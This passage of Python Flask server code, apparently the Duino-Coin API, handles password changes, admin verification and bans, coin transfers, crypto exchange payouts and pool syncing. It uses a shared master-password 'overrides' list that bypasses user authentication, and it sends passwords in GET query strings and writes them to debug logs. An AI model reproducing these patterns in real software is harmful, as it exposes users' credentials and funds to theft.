new_password_encrypted = hashpw(
new_password, gensalt(rounds=BCRYPT_ROUNDS))
if old_password == new_password:
return _error("New password must be different")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""SELECT *
FROM Users
WHERE username = ?""",
(username,))
old_password_database = datab.fetchone()[1].encode('utf-8')
except:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""SELECT *
FROM Users
WHERE username = ?""",
(username,))
old_password_database = datab.fetchone()[1]
if (checkpw(old_password, old_password_database)
or old_password.decode() in overrides):
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""UPDATE Users
set password = ?
where username = ?""",
(new_password_encrypted, username))
conn.commit()
print("Changed password of user " + username)
return _success("Your password has been changed")
else:
print("Passwords of user " + username + " don't match")
return _error("Your old password doesn't match!")
except Exception as e:
print("Error changing password: " + str(e))
return _error("Internal server error: " + str(e))
@app.route("/verify/<username>")
def api_verify(username: str):
try:
pwd = str(request.args.get('pass', None))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
admin = str(request.args.get('admin', "revox"))
reason = str(request.args.get('reason', None))
except Exception as e:
return _error(f"Invalid data: {e}")
if not user_exists(username):
return _error("Invalid username :(")
if not pwd in overrides:
return _error("Invalid password!!!")
if is_verified(username) == "yes":
return _error("This user is already verified :P")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set rig_verified = ?
where username = ?""",
("Yes", username))
conn.commit()
except Exception as e:
return _error(str(e))
try:
if not reason:
threading.Thread(target=protocol_verified_mail,
args=[username, admin]).start()
else:
threading.Thread(target=protocol_loved_verified_mail,
args=[username, admin]).start()
except Exception as e:
return _error(str(e))
dbg(f"Verified {username} by {ip_addr} ({pwd})")
return _success("Success")
@app.route("/notverify/<username>")
def api_not_verify(username: str):
try:
pwd = str(request.args.get('pass', None))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
admin = str(request.args.get('admin', "revox"))
reason = str(request.args.get("reason", ""))
except Exception as e:
return _error(f"Invalid data: {e}")
if not user_exists(username):
return _error("Invalid username :(")
if not pwd in overrides:
return _error("Invalid password!!!")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set rig_verified = ?
where username = ?""",
("No", username))
conn.commit()
except Exception as e:
return _error(str(e))
try:
threading.Thread(target=protocol_unverified_mail, args=[
username, admin, reason]).start()
except Exception as e:
return _error(str(e))
dbg(f"Rejected verification of user {username} by {ip_addr} ({pwd})")
return _success("Success")
@app.route("/userban/<username>")
def api_ban(username: str):
try:
pwd = str(request.args.get('pass', None))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
admin = str(request.args.get('admin', "revox"))
except Exception as e:
return _error(f"Invalid data: {e}")
if not user_exists(username):
return _error("Invalid username :(")
if not pwd in overrides:
return _error("Invalid password!!!")
protocol_ban(username)
dbg(f"Banned user {username} by {ip_addr} ({pwd})")
return _success("Success")
@app.route("/user_transactions/<username>")
@cache.cached(timeout=SAVE_TIME)
def get_transaction_by_username(username: str):
# dbg("/GET/user_transactions/"+str(username))
try:
limit = int(request.args.get('limit', 5))
except Exception as e:
return _error(f"Invalid data: {e}")
try:
transactions = get_transactions(username, limit)
return _success(transactions)
except Exception as e:
return _error(f"Error: {e}")
@app.route("/id_transactions/<tx_id>")
@cache.cached(timeout=SAVE_TIME)
def get_transaction_by_id(tx_id: str):
# dbg("/GET/id_transactions/"+str(tx_id))
try:
return _success(api_tx_by_id(tx_id))
except Exception as e:
return _error(f"No transaction found: {tx_id}")
def api_tx_by_id(tx_id: str):
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Transactions
WHERE id = ?""",
(tx_id, ))
row = datab.fetchone()
if not row:
raise Exception(f"No transaction found: {tx_id}")
return row_to_transaction(row)
@app.route("/transactions/<hash>")
@cache.cached(timeout=SAVE_TIME)
def get_transaction_by_hash(hash: str):
# dbg("/GET/transactions/"+str(hash))
try:
return _success(api_tx_by_hash(hash))
except Exception as e:
return _error(f"No transaction found: {hash}")
def api_tx_by_hash(hash: str):
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Transactions
WHERE hash = ?""",
(hash, ))
row = datab.fetchone()
if not row:
raise Exception(f"No transaction found: {hash}")
return row_to_transaction(row)
@app.route("/balances/<username>")
@cache.cached(timeout=SAVE_TIME)
def api_get_user_balance(username: str):
# dbg("/GET/balances/"+str(username))
try:
return _success(get_user_data(username))
except Exception as e:
return _error(f"This user doesn't exist: {username}")
@app.route("/balances")
@cache.cached(timeout=60)
def api_get_all_balances():
# dbg("/GET/balances")
try:
return _success(get_all_balances())
except Exception as e:
return _error(f"Error fetching balances: {e}")
@app.route("/transactions")
@cache.cached(timeout=60)
def api_get_all_transactions():
# dbg("/GET/transactions")
try:
return _success(get_all_transactions())
except Exception as e:
return _error(f"Error fetching transactions: {e}")
@app.route("/miners")
@cache.cached(timeout=60)
def api_get_all_miners():
# dbg("/GET/miners")
try:
return _success(get_all_miners())
except Exception as e:
return _error(f"Error fetching miners: {e}")
@app.route("/statistics")
@cache.cached(timeout=30)
def get_api_data():
# dbg("/GET/statistics")
data = {}
with open(API_JSON_URI, 'r') as f:
try:
data = load(f)
except:
pass
response = jsonify(data)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route("/ip")
def get_ip():
dbg("/GET/ip")
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
return _success(ip_addr)
@app.route("/statistics_miners")
@cache.cached(timeout=10)
def get_api_data_miners():
# dbg("/GET/statistics_miners")
all_miners = get_all_miners()
get_all_balances()
try:
to_return = {}
for user in all_miners:
count = len(all_miners[user])
try:
to_return[user] = {
"w": count,
"v": trusted[user]}
except:
continue
return _success(to_return)
except Exception as e:
return _error(str(e))
def row_to_day(day):
return {
"day_unix": day[0],
"day": day[1],
"price": day[2]
}
@app.route("/historic_prices")
@cache.cached(timeout=60)
def get_api_prices():
try:
currency = str(request.args.get('currency', None))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
limit = int(request.args.get('limit', 5))
allowed_currencies = ["bch", "xmg", "trx",
"nano", "justswap", "sushi", "max", "all"]
if not currency in allowed_currencies:
raise Exception("Invalid currency")
except Exception as e:
return _error(f"Invalid data: {e}")
try:
if currency == "all":
to_return = {}
for currency in allowed_currencies:
try:
with sqlconn("charts/prices.db", timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
f"""SELECT * FROM prices_{currency} ORDER BY day_unix DESC""")
data = datab.fetchall()
i = 0
to_return[currency] = []
for day in data:
to_return[currency].append(row_to_day(day))
i += 1
if i >= limit:
break
except:
pass
else:
with sqlconn("charts/prices.db", timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
f"""SELECT * FROM prices_{currency} ORDER BY day_unix DESC""")
data = datab.fetchall()
i = 0
to_return = []
for day in data:
to_return.append(row_to_day(day))
i += 1
if i >= limit:
break
return _success(to_return)
except Exception as e:
return _error(str(e))
def get_txid():
random = randint(-28110001, 28110001)
random_type = randint(0, XXHASH_TX_PROB+1)
if random_type != XXHASH_TX_PROB:
global_last_block_hash_cp = sha1(
bytes(str(random), encoding='ascii')).hexdigest()
else:
global_last_block_hash_cp = xxh64(
bytes(str(random), encoding='ascii'), seed=2811).hexdigest()
return global_last_block_hash_cp
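def _txid_sketch():
    # Editor's illustrative sketch (not part of the original API): the two hash
    # flavours produced by get_txid() above, for a fixed input instead of a random
    # integer. sha1 yields 40 hex chars, xxh64 (seeded as above) yields 16.
    sha_id = sha1(b'2811').hexdigest()
    xx_id = xxh64(b'2811', seed=2811).hexdigest()
    return sha_id, xx_id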
def send_exchange_error(error, email, txid, username, amount):
try:
global_last_block_hash_cp = get_txid()
recipient = username
sender = "coinexchange"
memo = "DUCO Exchange refund"
balance = get_user_data(sender)["balance"]
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(recipient,))
recipientbal = float(datab.fetchone()[3])
except:
return _error("Recipient doesn\'t exist")
if float(balance) >= float(amount):
balance -= float(amount)
recipientbal += float(amount)
while True:
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(balance, sender))
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(round(float(recipientbal), 20), recipient))
conn.commit()
break
except:
pass
formatteddatetime = now().strftime("%d/%m/%Y %H:%M:%S")
with sqlconn(CONFIG_TRANSACTIONS,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""INSERT INTO Transactions
(timestamp, username, recipient, amount, hash, memo)
VALUES(?, ?, ?, ?, ?, ?)""",
(formatteddatetime,
sender,
recipient,
amount,
global_last_block_hash_cp,
memo))
conn.commit()
except Exception as e:
print(f"Error refunding balance: {e}")
message = MIMEMultipart("alternative")
message["Subject"] = "⚠️ Error handling your DUCO exchange request"
try:
message["From"] = DUCO_EMAIL
message["To"] = email
email_body = html_error.replace(
"{error}", str(error)
).replace(
"{txid}", str(txid)
).replace(
"{refund_txid}", str(global_last_block_hash_cp)
).replace(
"{user}", str(username)
).replace(
"{amount}", str(amount)
)
part = MIMEText(email_body, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, email, message.as_string())
except Exception:
print(traceback.format_exc())
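# /exchange_request/ handles DUCO Exchange sell/buy requests. The flow:
# validate the account (verification status, e-mail, password, alt/IP
# checks), enforce the 200-10000 DUCO limits, fetch current rates from the
# duco-exchange GitHub API, then either launch a _quickexchange payout
# thread (supported coins, sell only), e-mail non-automated sell requests to
# the exchange inbox, or e-mail buy instructions back to the user; for sells
# the DUCO is then moved to the "coinexchange" account.
# Illustrative request (parameter values are made up):
#   GET /exchange_request/?username=alice&password=...&email=alice@example.com
#       &type=sell&amount=500&coin=trx&address=T...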
@app.route("/exchange_request/")
@limiter.limit("4 per 1 day")
def exchange_request():
try:
username = str(request.args.get('username', None))
unhashed_pass = request.args.get('password', None).encode('utf-8')
email = str(request.args.get('email', None))
ex_type = str(request.args.get('type', None)).upper()
amount = int(request.args.get('amount', None))
coin = str(request.args.get('coin', None)).lower()
address = str(request.args.get('address', None))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"Invalid data: {e}")
dbg("EX:", username, email)
# return _error("Exchange requests on DUCO Exchange are currently disabled, use other exchange")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
if is_verified(username) != "yes":
return _error("Your account is not verified, see https://server.duinocoin.com/verify.html")
if username in banlist or username in jailedusr:
return _error("You are not elgible for the exchange (ToS violation)")
# Check email
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
stored_mail = datab.fetchone()[2]
if not email == stored_mail:
return _error(
"This e-mail is not associated with your Duino-Coin account")
except Exception as e:
return _error("No user found: " + str(e))
# Check password
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
stored_password = datab.fetchone()[1]
try:
if not checkpw(unhashed_pass, stored_password):
return _error("Invalid password")
except Exception as e:
if not checkpw(unhashed_pass, stored_password.encode('utf-8')):
return _error("Invalid password")
except Exception as e:
return _error("No user found: " + str(e))
try:
altfeed = alt_check(ip_addr, username)
if altfeed[0]:
return _error(f"You're using multiple accounts: {altfeed[1]}, this is not allowed")
except Exception as e:
print(traceback.format_exc())
# Check the amount
if amount < 200:
return _error("Minimum exchangeable amount is 200 DUCO")
if amount > 10000:
return _error("Maximum exchangeable amount is 10000 DUCO.")
#acccheck = acc_check(address, username)
# if acccheck[0]:
# jail.append(username)
# return _error(f"This address is associated with another account(s): {acccheck[1]}")
if ex_type.upper() == "SELL":
balance = get_user_data(username)["balance"]
if amount > balance:
return _error("You don't have enough DUCO in your account ("
+ str(round(balance, 3))+")")
else:
exchange_balance = get_user_data(exchange_address["duco"])["balance"]
if amount > exchange_balance*10:
return _error("We don't have enough DUCO in our reserves. "
+ "Try again later or with a smaller amount")
# Get current exchange rates
try:
de_api = requests.get("https://github.com/revoxhere/duco-exchange/"
+ "raw/master/api/v1/rates",
data=None, headers={'Cache-Control': 'no-cache'}
).json()["result"]
except Exception as e:
return _error("Error getting exchange rates: " + str(e))
try:
exchanged_amount = round(
de_api[coin.lower()][ex_type.lower()]*amount,
len(str(de_api[coin.lower()][ex_type.lower()])))
except Exception:
return _error("That coin isn't listed")
if ex_type.upper() == "SELL":
min_amount = round(fees[coin.lower()] / de_api[coin.lower()]["sell"])
if amount < min_amount:
return _error(f"Minimum sellable amount for {(coin.upper())} is {min_amount} DUCO")
global_last_block_hash_cp = get_txid()
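    # Runs in a background thread for automated ("quick") sells: sends the
    # exchanged coins through the matching wallet API (BCH, XMG, TRX, LKE,
    # NANO), e-mails the user a confirmation, and falls back to
    # send_exchange_error() on failure.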
def _quickexchange(ex_type, username, email, amount, exchanged_amount, coin, address):
duco_txid = global_last_block_hash_cp
if coin.lower() == "bch":
tx_api = "https://blockchair.com/bitcoin-cash/transaction/"
try:
if len(str(address)) == 34:
address = str(convert.to_cash_address(address))
coin_txid = bch_key.send([(str(address),
float(exchanged_amount), 'bch')],
unspents=bch_key.get_unspents())
dbg("EX: Sent BCH", coin_txid)
except Exception as e:
print("EX: Error sending BCH", traceback.format_exc())
send_exchange_error(str(e), email, duco_txid, username, amount)
elif coin.lower() == "xmg":
tx_api = "https://magi.duinocoin.com/?search="
try:
coin_txid = requests.get(
"https://magi.duinocoin.com/transaction"
+ f"?username=revox&recipient={address}"
+ f"&password={DUCO_PASS}&amount={exchanged_amount}"
+ f"&memo=DUCO Exchange payment").json()
if "result" in coin_txid:
coin_txid = coin_txid["result"].split(",")[2]
dbg("EX: Sent XMG", coin_txid)
else:
raise Exception(coin_txid["message"])
except Exception as e:
print("EX: Error sending XMG", traceback.format_exc())
send_exchange_error(str(e), email, duco_txid, username, amount)
elif coin.lower() == "trx":
tx_api = "https://tronscan.org/#/transaction/"
try:
coin_txid = trx_key.trx.send_transaction(str(address),
float(exchanged_amount-1))["txid"]
dbg("EX: Sent TRX", coin_txid)
except Exception as e:
print("EX: Error sending TRX", traceback.format_exc())
send_exchange_error(str(e), email, duco_txid, username, amount)
elif coin.lower() == "lke":
tx_api = "https://explorer.likecoin.pro/tx/"
try:
coin_txid = likecoin_transaction(str(address), int(
exchanged_amount), "DUCO Exchange payment")
dbg("EX: Sent LKE", coin_txid)
except Exception as e:
print("EX: Error sending LKE", traceback.format_exc())
send_exchange_error(str(e), email, duco_txid, username, amount)
elif coin.lower() == "nano":
tx_api = "https://nanocrawler.cc/explorer/block/"
try:
coin_txid = nano_key.send(
str(address), float(exchanged_amount))
dbg("EX: Sent NANO", coin_txid)
except Exception as e:
print("EX: Error sending NANO", traceback.format_exc())
send_exchange_error(str(e), email, duco_txid, username, amount)
html = """\
<html>
<body>
<p style="font-size:18px">
Automatic exchange finished<br>
Type: <b>""" + str(ex_type) + """</b><br>
Username: <b>""" + str(username) + """</b><br>
Amount: <b>""" + str(amount) + """</b> DUCO<br>
Email: <b>""" + str(email) + """</b><br>
Address: <b>""" + str(address) + """</b><br>
Sent: <b>""" + str(exchanged_amount) + """</b> """ + coin.upper() + """<br>
TXID: <a href='""" + str(tx_api) + str(coin_txid) + """'>"""+str(coin_txid)+"""</a><br>
DUCO TXID: <a href="https://explorer.duinocoin.com?search=""" + str(global_last_block_hash_cp) + """">"""+str(global_last_block_hash_cp)+"""</a>
</p>
</body>
</html>"""
try:
pass
#message = MIMEMultipart("alternative")
# message["Subject"] = ("✅ Auto DUCO - "
# + str(coin).upper()
# + " "
# + ex_type.upper()
# + " exchange finished")
#message["From"] = DUCO_EMAIL
#message["To"] = EXCHANGE_MAIL
#part = MIMEText(html, "html")
# message.attach(part)
#context = ssl.create_default_context()
# with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
# smtp.login(
# DUCO_EMAIL, DUCO_PASS)
# smtp.sendmail(
# DUCO_EMAIL, EXCHANGE_MAIL, message.as_string())
except Exception as e:
return _error("Error sending an e-mail to the exchange system")
####
email_body = html_auto.replace(
"{user}", str(username)
).replace(
"{amount}", str(amount)
).replace(
"{tx_api}", str(tx_api)
).replace(
"{txid}", str(coin_txid)
).replace(
"{duco_tx}", str(global_last_block_hash_cp))
message = MIMEMultipart("alternative")
message["Subject"] = "✨ Your DUCO - " + \
str(coin).upper()+" exchange is done!"
try:
message["From"] = DUCO_EMAIL
message["To"] = email
part = MIMEText(email_body, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, email, message.as_string())
except Exception:
print(traceback.format_exc())
quickexchange = ["bch", "trx", "lke", "nano", "xmg", "bkc"]
if ex_type.lower() == "sell" and coin.lower() in quickexchange:
try:
threading.Thread(
target=_quickexchange,
args=[ex_type, username, email, amount, exchanged_amount, coin, address]).start()
dbg("Launched exchange thread")
except Exception as e:
return _error(f"Error lanching transaction thread: {e}")
elif ex_type.lower() == "sell":
html = """\
<html>
<body>
<p style="font-size:18px">
All checks for this user passed, exchange data:<br>
Type: <b>""" + str(ex_type) + """</b><br>
Username: <b>""" + str(username) + """</b><br>
Amount: <b>""" + str(amount) + """</b> DUCO<br>
Email: <b>""" + str(email) + """</b><br>
Address: <b>""" + str(address) + """</b><br>
Send: <b>""" + str(exchanged_amount) + """</b> """ + coin.upper() + """<br>
</p>
</body>
</html>"""
try:
message = MIMEMultipart("alternative")
message["Subject"] = ("⚠️ Manual DUCO - "
+ str(coin).upper()
+ " "
+ ex_type.lower()
+ " request")
message["From"] = DUCO_EMAIL
message["To"] = EXCHANGE_MAIL
part = MIMEText(html, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, EXCHANGE_MAIL, message.as_string())
except Exception as e:
return _error("Error sending an e-mail to the exchange system")
###
message = MIMEMultipart("alternative")
message["Subject"] = "🍒 Your DUCO Exchange sell request has been received"
try:
message["From"] = DUCO_EMAIL
message["To"] = email
email_body = html_exc.replace(
"{user}", str(username)
).replace(
"{ex_type}", str(ex_type.lower())
).replace(
"{amount}", str(amount)
).replace(
"{address}", str(address)
)
part = MIMEText(email_body, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, email, message.as_string())
except Exception:
print(traceback.format_exc())
elif ex_type.lower() == "buy":
###
message = MIMEMultipart("alternative")
message["Subject"] = "🔥 Finish your DUCO Exchange buy request"
try:
message["From"] = DUCO_EMAIL
message["To"] = email
email_body = html_buy.replace(
"{user}", str(username)
).replace(
"{coin}", str(coin.upper())
).replace(
"{amount}", str(amount)
).replace(
"{exchanged_amount}", str(exchanged_amount)
).replace(
"{exchange_address}", str(exchange_address[coin.lower()])
)
part = MIMEText(email_body, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, email, message.as_string())
except Exception:
print(traceback.format_exc())
if ex_type.lower() == "sell":
try:
recipient = "coinexchange"
memo = ("DUCO Exchange transaction "
+ "(sell for "
+ str(coin.upper())
+ ")")
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(recipient,))
recipientbal = float(datab.fetchone()[3])
except:
return _error("Recipient doesn\'t exist")
if float(balance) >= float(amount):
balance -= float(amount)
recipientbal += float(amount)
while True:
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(balance, username))
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(round(float(recipientbal), 20), recipient))
conn.commit()
break
except:
pass
formatteddatetime = now().strftime("%d/%m/%Y %H:%M:%S")
with sqlconn(CONFIG_TRANSACTIONS,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""INSERT INTO Transactions
(timestamp, username, recipient, amount, hash, memo)
VALUES(?, ?, ?, ?, ?, ?)""",
(formatteddatetime,
username,
recipient,
amount,
global_last_block_hash_cp,
memo))
conn.commit()
except Exception:
return _success("Error deducting balance")
return _success("Your exchange request has been successfully submited")
@app.route("/transaction/")
@limiter.limit("2 per 1 minute")
def api_transaction():
global last_transfer
global banlist
global rate_count
try:
username = str(request.args.get('username', None))
unhashed_pass = str(request.args.get('password', None)).encode('utf-8')
recipient = str(request.args.get('recipient', None))
amount = float(request.args.get('amount', None))
memo = sub(r'[^A-Za-z0-9 .-:!#_+-]+', ' ',
str(request.args.get('memo', None)))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"NO,Invalid data: {e}")
dbg(f"New TX request: {username}",
f"\n\t pwd: {unhashed_pass}",
f"\n\t amount: {amount}",
f"\n\t recipient: {recipient}",
f"\n\t memo: {memo}")
if not user_exists(username):
return _error("NO,User doesn\'t exist")
if not user_exists(recipient):
return _error("NO,Recipient doesn\'t exist")
    if username not in chain_accounts:
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
# return _error("Temporarily disabled")
"""try:
if not username in chain_accounts:
if recipient in chain_accounts:
acccheck = acc_check(memo, username)
if acccheck[0]:
jail.append(username)
return _error(f"NO,This address is associated with another account(s): {acccheck[1]}")
except Exception as e:
print(traceback.format_exc())"""
if len(str(memo)) > 256:
memo = str(memo[0:253]) + "..."
if not match(r"^[A-Za-z0-9_-]*$", username):
return _error("NO,Incorrect username")
if not match(r"^[A-Za-z0-9_-]*$", recipient):
return _error("NO,Incorrect recipient")
if is_verified(username) == "no":
return _error("NO,Verify your account first")
if username in jail:
return _error("NO,BONK - go to kolka jail")
if recipient in banlist or recipient in jailedusr:
return _error("NO,Can\'t send funds to that user")
if username in banlist:
print(username, "in banlist")
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_addr_ban(ip_addr, True)
return _error("NO,User baned")
if memo == "-" or memo == "":
memo = "None"
if round(float(amount), DECIMALS) <= 0:
return _error("NO,Incorrect amount")
if username in rate_count:
if rate_count[username] >= 3:
banlist.append(username)
if username in last_transfer:
if (now() - last_transfer[username]).total_seconds() <= 30:
ip_addr = request.environ.get(
'HTTP_X_REAL_IP', request.remote_addr)
            if ip_addr not in whitelist:
dbg("TX: rate limiting", username,
(now() - last_transfer[username]).total_seconds(), "s")
return _error(
"NO,Please wait some time before making a transaction")
try:
rate_count[username] += 1
except:
rate_count[username] = 1
    if unhashed_pass.decode() not in overrides:
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
user = datab.fetchone()
stored_password = user[1]
stored_email = user[2]
try:
data = jwt.decode(unhashed_pass.decode("utf-8"), app.config['SECRET_KEY'], algorithms=['HS256'])
if data["email"] != stored_email:
return _error("NO,Invalid token")
except Exception as e:
try:
if not checkpw(unhashed_pass, stored_password):
return _error("NO,Invalid password")
except:
if not checkpw(unhashed_pass, stored_password.encode('utf-8')):
return _error("NO,Invalid password")
except Exception as e:
print(e)
return _error("NO,No user found: " + str(e))
else:
if memo == "None":
memo = "OVERRIDE"
try:
        if username not in chain_accounts:
altfeed = alt_check(ip_addr, username)
if altfeed[0]:
checked_u = altfeed[1].split(" ")[0]
if username != checked_u:
return _error(f"NO,You're using multiple accounts: {altfeed[1]}, this is not allowed")
except Exception as e:
print(traceback.format_exc())
try:
global_last_block_hash_cp = get_txid()
if str(recipient) == str(username):
return _error("NO,You\'re sending funds to yourself")
if (str(amount) == "" or float(amount) <= 0):
return _error("NO,Incorrect amount")
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(username,))
balance = float(datab.fetchone()[3])
if (float(balance) <= float(amount)):
return _error("NO,Incorrect amount")
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(recipient,))
recipientbal = float(datab.fetchone()[3])
except:
return _error("NO,Recipient doesn\'t exist")
if float(balance) >= float(amount):
balance -= float(amount)
recipientbal += float(amount)
while True:
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(balance, username))
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(round(float(recipientbal), 20), recipient))
conn.commit()
break
except:
pass
formatteddatetime = now().strftime("%d/%m/%Y %H:%M:%S")
with sqlconn(CONFIG_TRANSACTIONS,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""INSERT INTO Transactions
(timestamp, username, recipient, amount, hash, memo)
VALUES(?, ?, ?, ?, ?, ?)""",
(formatteddatetime,
username,
recipient,
amount,
global_last_block_hash_cp,
memo))
conn.commit()
dbg(f"Success: transferred {amount} DUCO from",
f"{username} to {recipient} ({memo})")
last_transfer[username] = now()
return _success("OK,Successfully transferred funds,"
+ str(global_last_block_hash_cp))
except Exception as e:
print(e)
return _error("NO,Internal server error")
@app.route("/pool_sync/", methods=['GET', 'POST'])
@limiter.limit("10 per 1 minute")
def api_sync_proxy():
try:
if request.method == 'POST':
rewards = request.files['rewards']
filename = secure_filename(rewards.filename)
rewards.save(os.path.join("/home/debian/websites/", filename))
workers = request.files['workers']
filename = secure_filename(workers.filename)
workers.save(os.path.join("/home/debian/websites/", filename))
# dbg("Downloaded files from", request.args.get('name', None))
except Exception as e:
print(traceback.format_exc())
s = socket()
s.settimeout(15)
loginInfos = {}
syncData = {"blocks": {}}
try:
loginInfos["host"] = str(request.args.get('host', None))
loginInfos["port"] = str(request.args.get('port', None))
loginInfos["version"] = str(request.args.get('version', None))
loginInfos["identifier"] = str(request.args.get('identifier', None))
loginInfos["name"] = request.args.get('name', None)
syncData["blocks"]["blockIncrease"] = str(
request.args.get('blockIncrease', None))
syncData["cpu"] = str(request.args.get('cpu', None))
syncData["ram"] = str(request.args.get('ram', None))
syncData["connections"] = str(request.args.get('connections', None))
syncData["post"] = "False"
if request.method == 'POST':
syncData["post"] = "True"
except Exception as e:
return _error(f"Invalid data: {e}")
while True:
try:
port = choice([2810, 2809, 2808, 2807, 2806])
s.connect(("127.0.0.1", port))
recv_ver = s.recv(5).decode().rstrip("\n")
if not recv_ver:
dbg(f"Warning: {loginInfos['name']} connection interrupted")
return _error(f"Connection interrupted")
elif float(recv_ver) != 2.7:
dbg(f"Warning: {loginInfos['name']} server versions don't match: {2.7}, {recv_ver}")
return _error(f"Invalid ver: {recv_ver}")
s.sendall(f"PoolLogin,{json.dumps(loginInfos)}\n".encode("utf-8"))
login_state = s.recv(16).decode().rstrip("\n")
if not login_state:
dbg(f"Warning: {loginInfos['name']} connection interrupted")
return _error(f"Connection interrupted")
if login_state != "LoginOK":
dbg(f"Error: {loginInfos['name']} invalid login state: {login_state}")
return _error(login_state)
s.sendall(f"PoolSync,{json.dumps(syncData)}\n".encode("utf-8"))
sync_state = s.recv(16).decode().rstrip("\n")
if not sync_state:
dbg(f"Warning: {loginInfos['name']} connection interrupted")
return _error(f"Connection interrupted")
if sync_state != "SyncOK":
dbg(f"Error: {loginInfos['name']} invalid sync state: {sync_state}")
return _error(sync_state)
s.close()
# dbg(f"Success: {loginInfos['name']} synced")
return _success(sync_state)
except Exception as e:
if not "timed out" in str(e) and not "abort" in str(e):
dbg(f"Error: {loginInfos['name']} {e}")
return _error("Sync error: " + str(e))
@app.route("/recovering/<username>")
@limiter.limit("1 per 1 day")
def api_recovering(username: str):
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
pwd_hash = request.args.get('hash', None)
except Exception as e:
return _error(f"Invalid data: {e}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
try:
token_hash = jwt.decode(pwd_hash, app.config['SECRET_KEY'], algorithms=['HS256'])
except jwt.ExpiredSignatureError:
return _error('Signature expired. Please log in again.')
except jwt.InvalidTokenError:
return _error('Invalid token. Please log in again.')
if username is None or username == '':
return _error("Invalid username.")
if username != token_hash['username']:
return _error("Invalid username.")
if user_exists(username):
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
